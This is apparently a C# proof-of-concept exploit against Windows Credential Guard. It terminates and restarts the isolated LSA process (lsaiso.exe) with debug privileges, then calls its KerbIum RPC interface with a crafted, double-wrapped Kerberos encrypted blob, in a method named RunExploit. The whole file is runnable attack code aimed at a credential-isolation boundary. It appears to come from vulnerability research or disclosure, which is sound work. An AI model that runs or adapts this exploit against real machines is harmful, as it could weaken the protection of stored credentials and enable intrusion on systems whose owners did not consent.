﻿using KerbIumRpc;
using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Utilities.ASN1.Builder;
using NtApiDotNet.Utilities.Text;
using NtApiDotNet.Win32.Security.Authentication.Kerberos;
using System;
using System.Collections.Generic;
using System.Linq;

namespace poc
{
    internal static class Program
    {
        static void StopLsaIso()
        {
            using (var processes = NtProcess.GetProcesses(ProcessAccessRights.AllAccess).ToDisposableList())
            {
                foreach (var process in processes)
                {
                    if (process.Name.Equals("lsaiso.exe", StringComparison.OrdinalIgnoreCase) && !process.IsDeleting)
                    {
                        Console.WriteLine("Terminating LSAISO at PID {0}", process.ProcessId);
                        process.BreakOnTermination = false;
                        process.Terminate(0);
                        process.Wait();
                    }
                }
            }
        }

        static NtProcessCreateResult RestartLsaIso()
        {
            NtToken.EnableDebugPrivilege();
            StopLsaIso();

            string path = $@"{Environment.GetFolderPath(Environment.SpecialFolder.System)}\lsaiso.exe";
            Console.WriteLine(path);
            NtProcessCreateConfig config = new NtProcessCreateConfig
            {
                ImagePath = $@"\??\{path}",
                CommandLine = "lsaiso -CredGuard",
                Secure = true
            };
            return NtProcess.Create(config);
        }

        internal static void CheckResult(this int result)
        {
            if (result < 0)
                throw new NtException((NtStatus)result);
        }

        static Client Connect(out NdrContextHandle handle)
        {
            Client c = new Client();
            c.Connect("LSA_ISO_RPC_SERVER");
            c.KerbIumGetClientContext(out handle).CheckResult();
            return c;
        }

        internal static string ToHexDump(this byte[] ba)
        {
            HexDumpBuilder builder = new HexDumpBuilder(true, true, true, true, 0);
            builder.Append(ba);
            builder.Complete();
            return builder.ToString();
        }

        private static KERB_ENCRYPTION_KEY GetKey(IEnumerable<KERB_ENCRYPTION_KEY> keys, KerberosEncryptionType type)
        {
            return keys.Where(k => k.EncryptionType == (int)type).First();
        }

        public static KERB_ENCRYPTION_KEY[] BuildKeys(Client c, NdrContextHandle handle, string username, string realm, string password)
        {
            KerbSharedConfiguration config = new KerbSharedConfiguration(4096, 4096, 4096, 4096, 4096);
            c.KerbIumUpdateSharedConfiguration(handle, config, out config).CheckResult();

            KERB_PASSWORD_OR_BLOB pwd = new KERB_PASSWORD_OR_BLOB(IntPtr.Zero, 0, 
                new KERB_PASSWORD_OR_BLOB_UNION(0, default, new UNICODE_STRING(password)));
            c.KerbIumBuildPasswordList(handle, pwd, new UNICODE_STRING("ABC"),
                new UNICODE_STRING(realm.ToUpper()), null, null, new UNICODE_STRING(username), 0, 1, 0, 
                out KERB_STORED_CREDENTIAL? cred).CheckResult();
            return cred?.UserKeys.Select(v => v.Key).ToArray() ?? new KERB_ENCRYPTION_KEY[0];
        }

        static void RunExploit()
        {
            Client c = Connect(out NdrContextHandle handle);
            var keys = BuildKeys(c, handle, "alice", "DOMAIN.LOCAL", "Passw0rd1");
            KERB_ENCRYPTION_KEY key = GetKey(keys, KerberosEncryptionType.ARCFOUR_HMAC_MD5);

            var enc_data_inner = KerberosEncryptedData.Create(KerberosEncryptionType.NULL, new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 });

            KerberosAuthenticationKey real_key = KerberosAuthenticationKey.DeriveKey(KerberosEncryptionType.ARCFOUR_HMAC_MD5,
                "Passw0rd1", 0, KerberosNameType.PRINCIPAL, string.Empty, string.Empty, 0);

            DERBuilder der_builder = new DERBuilder();
            der_builder.WriteObject(enc_data_inner);
            enc_data_inner = KerberosEncryptedData.Create(KerberosEncryptionType.NULL,
                der_builder.ToArray()).Encrypt(real_key, KerberosKeyUsage.TgsRepEncryptedPart);
            der_builder = new DERBuilder();
            der_builder.WriteObject(enc_data_inner);
            byte[] enc_data = der_builder.ToArray();

            KERB_ASN1_DATA asn1_data = new KERB_ASN1_DATA(6, enc_data.Length, enc_data);

            c.KerbIumUnpackKdcReplyBody(handle, asn1_data, key, null, 6, (int)KerberosKeyUsage.TgsRepEncryptedPart,
                out int _, out KERB_ENCRYPTION_KEY[] _, out int error, out asn1_data).CheckResult();
            if (error != 0)
                throw new Exception($"Error {error}");
        }

        static void Main(string[] args)
        {
            try
            {
                using (var lsaiso = RestartLsaIso())
                {
                    lsaiso.Process.Wait(2);
                    if (lsaiso.Process.ExitNtStatus != NtStatus.STATUS_PENDING)
                        throw new Exception("Couldn't start lsaiso");
                }
                RunExploit();
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
